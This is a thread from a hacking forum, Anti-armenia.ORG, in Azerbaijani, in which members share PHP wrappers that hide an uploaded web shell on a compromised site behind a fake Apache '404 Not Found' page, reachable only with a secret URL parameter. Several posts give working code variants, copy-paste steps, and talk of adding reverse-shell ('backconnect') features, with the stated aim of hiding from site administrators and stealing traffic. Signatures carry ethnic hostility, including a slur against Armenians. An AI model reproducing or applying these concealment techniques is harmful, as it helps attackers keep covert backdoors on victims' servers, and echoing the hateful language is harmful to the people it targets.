Anti-armenia.ORG - Forumlar - Shell-in gizlədilməsi



Istifadəçi
    2013-01-28 08:31 GMT                 

StealtH



Security
Mesaj Sayı : 839
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   25  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Sumqayıt
Ölkə :
Məslək : Pan - Turkism
Yaş : 34
Mesaj :

Mövzunu Paylaş!


Hərdən elə olurki sayta shell upload edəndən sonra onu hacklamaq yox misal üçün traffiki oğurlamaq üçün shell-i serverdə admindən gizlətmək tələb olunur
Sizlərə indi shell-i 404 error adı altında gizlətməyi göstərəcəm
İş üçün bu shelli götürək http://anti-armenia.org/forums.php?m=posts&q=499
Shellin source kodunu baxırıq
Kodun lap əvvəlində <?php dan sonra belə bir kod əlavə edirik

Kod:
# id
# shell
if ($_GET['id'] == 'shell'){


və sonra shellin kodunu lap sonuna bu kodu əlavə edirik

Kod:
}else{
echo'
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port 80</address>
';
}


vəssalam , shelli 404.php fayl adı altında save edirik
əgər kimsə brauzerdə 404.php faylını açmaq istəsə ona 404 erroru görsənəcək
shelli açmaq üçün brauzerdə bu url-i açmaq lazımdir

http://site.com/404.php?id=shell

Bura Ergenekon, təpədən-dırnağa Türkəm!

http://s41.radikal.ru/i092/1308/a7/c6e81f41523b.png
Anti-armenia.ORG
    

Istifadəçi
    2013-01-28 10:55 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Belə daha qəşəngdir)) Çünki yuxarıdakında status code 200 verəcək onunla bilmək olar.


Kod:
<?php
$xD='<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port ' . $_SERVER['SERVER_PORT'] . '</address>' . PHP_EOL;
if(!isset($_GET['id']) || empty($_GET['id']) || !is_string($_GET['id'])){echo $xD;header('Status: 404 Not found!');exit;}?>


<?php
/*Actual backdoor goes here*/
echo '<h1>Welcome to your Shell!</h1>' . PHP_EOL . '<br>' .PHP_EOL;
?>

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2013-01-28 12:29 GMT                 

StealtH



Security
Mesaj Sayı : 839
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   25  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Sumqayıt
Ölkə :
Məslək : Pan - Turkism
Yaş : 34
Mesaj :

Mövzunu Paylaş!


Sitat
#14536 BlackMinD :
Belə daha qəşəngdir))



bele bir variant da olar

Kod:
<?php
if(!empty($_GET['iadmin']))
  {
      // bura shell atırıq
  }
  else
  {
        header("HTTP/1.0 404 Not Found");
  }
?>
e]

Bura Ergenekon, təpədən-dırnağa Türkəm!

http://s41.radikal.ru/i092/1308/a7/c6e81f41523b.png
Anti-armenia.ORG
    

Istifadəçi
    2013-01-28 12:34 GMT                 

AZE.HacK



Gold
Mesaj Sayı : 244
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   6  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : Designer
Yaş :
Mesaj :

Mövzunu Paylaş!


Hər İkinizə Təşəkkür. BlackMind Sənin Verdiyin Koddan Necə İstifadə edək?

Benim arkadaşlarım benim zaafımdır. Kim benim zaafıma dokunursa onu parçalarım!
Anti-armenia.ORG
    

Istifadəçi
    2013-01-28 12:56 GMT                 

Ferid23



Admin
Mesaj Sayı : 1875
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   45  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Anti-armenia.ORG
Ölkə :
Məslək : Programmer & Defacer
Yaş : 12
Mesaj :

Mövzunu Paylaş!


Gözəl metod təşəkkürlər bros StealtH & BlackMinD

AZ Domaini İhbar Hattı (Azərbaycan saytlarında olan boşluqları bizə bildirin): http://anti-armenia.org/forums.php?m=posts&q=572
Qaydalar (Saytın qayda-qanunlarını oxuyaraq əməl edin)
Anti-armenia.ORG
    

Istifadəçi
    2013-01-28 13:02 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


@StealtH
if else aləmi qatacaq çünki shellərin əksəriyyəti short_open tags deyil full tagların açılması ilə yazılır.
Başı çıxmayan adam sözsüzki gör nəqədər problem yaşacaq if else edənə qədər.
Mən verdiyim metod isə sadə və daha gözəldir else-ə də heç ehtiyyac yoxdur skript yuxarıdakı yoxlanışda avtomatik özünü çezdirəcək deyə)

@AZE.HacK

Bunu copy/paste elə shellə:

Kod:
<?php
$xD='<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port ' . $_SERVER['SERVER_PORT'] . '</address>' . PHP_EOL;
if(!isset($_GET['id']) || empty($_GET['id']) || !is_string($_GET['id'])){echo $xD;header('Status: 404 Not found!');exit;}?>



//BURDA İSƏ SHELL-İ COPY PASTE ELƏ.
ode]
Çağıranda
site.am/bufayl.php?id=loool
[/code]

elə oldu hazır)

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2013-01-28 13:09 GMT                 

TheConficker



VIP
Mesaj Sayı : 195
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   6  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


BlackMinD Salam Əleyküm bro mən elə kukladan istifadə edirəm yəni şelli gizlətmək lazım olanda kuklanı işə salıram gizlədirəm))
həm gizlənir həmdə şifrəlidir))

Anti-armenia.ORG
    

Istifadəçi
    2013-01-28 13:11 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


@TheConficker

xaxaxaxA) Bro mənim o shellimi deyirsən? xD
Onu gərək təkmilləşdirime bro yəqinki versiya 3 gələcək birazdana.İnankı o qədər baş qarışıq olurki hər dəfə yadan çıxır amma söz Priv 3 yazacağam əlavələr edəcəyəm PostGres,MSSQL-nən işi də əlavə edəcəyəm)

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2013-01-28 16:45 GMT                 

TheConficker



VIP
Mesaj Sayı : 195
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   6  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Sitat
#14547 BlackMinD :
@TheConficker

xaxaxaxA) Bro mənim o shellimi deyirsən? xD
Onu gərək təkmilləşdirime bro yəqinki versiya 3 gələcək birazdana.İnankı o qədər baş qarışıq olurki hər dəfə yadan çıxır amma söz Priv 3 yazacağam əlavələr edəcəyəm PostGres,MSSQL-nən işi də əlavə edəcəyəm)



həəə onu deyirəm sənə keçəndəfə demişdim onu təkmilləşdir məsələn backconnect və sariə lazımlı əmirlər əlavə et

Anti-armenia.ORG
    

Istifadəçi
    2013-01-29 20:36 GMT                 

ThEnD



Banned
Mesaj Sayı : 97
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 10
Mesaj :

Mövzunu Paylaş!


gözəl metoddu əla təşəkkürlər

Anti-armenia.ORG
    

Istifadəçi
    2013-02-01 11:14 GMT                 

By DipAZoL



İstifadəçi
Mesaj Sayı : 4
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Flashkart tapım məndə başlayacam hack-a proqramların heç biri yoxdu məndə bilmirəm hara yükləyim

Anti-armenia.ORG
    

Istifadəçi
    2013-02-01 11:22 GMT                 

Frozen



İstifadəçi
Mesaj Sayı : 135
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Bəs shelli gizlədəndə 404 not found yazacaq. Onda shellə necə girim?

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
    

Istifadəçi
    2013-02-01 20:04 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


@Frozen onu qeyd etmişik ki shellə site.am/bufayl.php?id=loool
paramatr verməklə girəcəksən.
Əks halda not found.

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2015-04-27 14:09 GMT                 

HideHacker



Gold
Mesaj Sayı : 813
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   53  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Target: armenian bitchs
Ölkə :
Məslək : HideHacker
Yaş : 130
Mesaj :

Mövzunu Paylaş!


Hər ikivizə təşəkkür
+1 ikinizədə

KARABAKH belongs to AZERBAİJAN!!!
Anti-armenia.ORG
    

Istifadəçi
    2015-04-27 14:35 GMT                 

C4pt41n Pr0xy



VIP
Mesaj Sayı : 1448
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   45  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Şuşa
Ölkə :
Məslək : Student
Yaş : 21
Mesaj :

Mövzunu Paylaş!


Təşəkkürlər!

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
    

Istifadəçi
    2015-04-27 20:36 GMT                 

realliq



VIP
Mesaj Sayı : 181
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 32
Mesaj :

Mövzunu Paylaş!


Hamıvıza təşəkkürlər...

Anti-armenia.ORG